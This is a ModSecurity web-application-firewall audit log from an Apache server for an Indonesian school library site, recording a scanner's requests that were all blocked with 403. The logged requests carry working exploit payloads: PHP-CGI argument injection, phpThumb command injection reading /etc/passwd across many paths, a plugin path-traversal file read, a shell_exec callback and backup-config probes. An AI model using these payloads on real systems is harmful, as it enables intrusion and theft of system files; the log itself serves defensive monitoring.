--f693960c-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--f693960c-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578343814705 2003 (- - -)
Stopwatch2: 1745578343814705 2003; combined=733, p1=346, p2=360, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f693960c-Z--
--6516dd40-A--
[25/Apr/2025:17:52:24 +0700] aAtpaOXF4ZX3hX-IbN7jFgAAAIA 103.236.140.4 44612 103.236.140.4 8181
--6516dd40-B--
GET /config.inc.php.bak HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270171
--6516dd40-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--6516dd40-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578344213489 1881 (- - -)
Stopwatch2: 1745578344213489 1881; combined=730, p1=338, p2=365, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6516dd40-Z--
--f83a7678-A--
[25/Apr/2025:17:52:25 +0700] aAtpaeXF4ZX3hX-IbN7jHwAAAI0 103.236.140.4 44642 103.236.140.4 8181
--f83a7678-B--
GET /index.php?-d+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363647
--f83a7678-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--f83a7678-E--
--f83a7678-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:-d allow_url_include=on -d auto_prepend_file=php://input: -d allow_url_include=on -d auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578345618848 3773 (- - -)
Stopwatch2: 1745578345618848 3773; combined=1983, p1=473, p2=1398, p3=0, p4=0, p5=112, sr=80, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f83a7678-Z--
--e710af50-A--
[25/Apr/2025:17:52:26 +0700] aAtpauXF4ZX3hX-IbN7jJAAAAI4 103.236.140.4 44654 103.236.140.4 8181
--e710af50-B--
GET /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270192
--e710af50-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e710af50-E--
--e710af50-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost
Stopwatch: 1745578346619366 1939 (- - -)
Stopwatch2: 1745578346619366 1939; combined=584, p1=370, p2=178, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e710af50-Z--
--c69ad375-A--
[25/Apr/2025:17:52:28 +0700] aAtpbOOdEP6frSVs8Cp5zAAAABY 103.236.140.4 44668 103.236.140.4 8181
--c69ad375-B--
GET /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363668
--c69ad375-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--c69ad375-E--
--c69ad375-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578348224542 2369 (- - -)
Stopwatch2: 1745578348224542 2369; combined=812, p1=391, p2=384, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c69ad375-Z--
--3311e426-A--
[25/Apr/2025:17:52:29 +0700] aAtpbeOdEP6frSVs8Cp50AAAABU 103.236.140.4 44682 103.236.140.4 8181
--3311e426-B--
GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270212
--3311e426-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3311e426-E--
--3311e426-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578349021646 1789 (- - -)
Stopwatch2: 1745578349021646 1789; combined=571, p1=358, p2=180, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3311e426-Z--
--5aaf0329-A--
[25/Apr/2025:17:52:29 +0700] aAtpbeOdEP6frSVs8Cp50wAAAA4 103.236.140.4 44682 103.236.140.4 8181
--5aaf0329-B--
GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363680
--5aaf0329-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--5aaf0329-E--
--5aaf0329-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578349619453 1807 (- - -)
Stopwatch2: 1745578349619453 1807; combined=561, p1=378, p2=147, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5aaf0329-Z--
--5a26f77e-A--
[25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53AAAABA 103.236.140.4 44712 103.236.140.4 8181
--5a26f77e-B--
GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363695
--5a26f77e-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--5a26f77e-E--
--5a26f77e-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578351223926 1807 (- - -)
Stopwatch2: 1745578351223926 1807; combined=598, p1=412, p2=159, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5a26f77e-Z--
--8f63eb44-A--
[25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53QAAAA0 103.236.140.4 44712 103.236.140.4 8181
--8f63eb44-B--
GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270233
--8f63eb44-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--8f63eb44-E--
--8f63eb44-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578351422077 1849 (- - -)
Stopwatch2: 1745578351422077 1849; combined=600, p1=428, p2=140, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8f63eb44-Z--
--1da3fa35-A--
[25/Apr/2025:17:52:31 +0700] aAtpb-OdEP6frSVs8Cp53gAAAAk 103.236.140.4 44712 103.236.140.4 8181
--1da3fa35-B--
GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363698
--1da3fa35-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--1da3fa35-E--
--1da3fa35-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578351620539 1492 (- - -)
Stopwatch2: 1745578351620539 1492; combined=511, p1=362, p2=122, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1da3fa35-Z--
--d2ff397d-A--
[25/Apr/2025:17:52:31 +0700] aAtpb_Ku9d5eAb6Kn98pewAAAMM 103.236.140.4 44726 103.236.140.4 8181
--d2ff397d-B--
GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363701
--d2ff397d-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--d2ff397d-E--
--d2ff397d-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578351819239 2330 (- - -)
Stopwatch2: 1745578351819239 2330; combined=588, p1=398, p2=157, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d2ff397d-Z--
--e4767368-A--
[25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfAAAAMY 103.236.140.4 44726 103.236.140.4 8181
--e4767368-B--
GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137270239
--e4767368-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e4767368-E--
--e4767368-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578352018398 1788 (- - -)
Stopwatch2: 1745578352018398 1788; combined=539, p1=382, p2=129, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e4767368-Z--
--e1bd7164-A--
[25/Apr/2025:17:52:32 +0700] aAtpcPKu9d5eAb6Kn98pfQAAAMw 103.236.140.4 44726 103.236.140.4 8181
--e1bd7164-B--
GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9363704
--e1bd7164-F--
HTTP/1.1 403 Forbidden
X-Frame-Options: SAMEORIGIN
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e1bd7164-E--
--e1bd7164-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745578352216803 1486 (- - -)
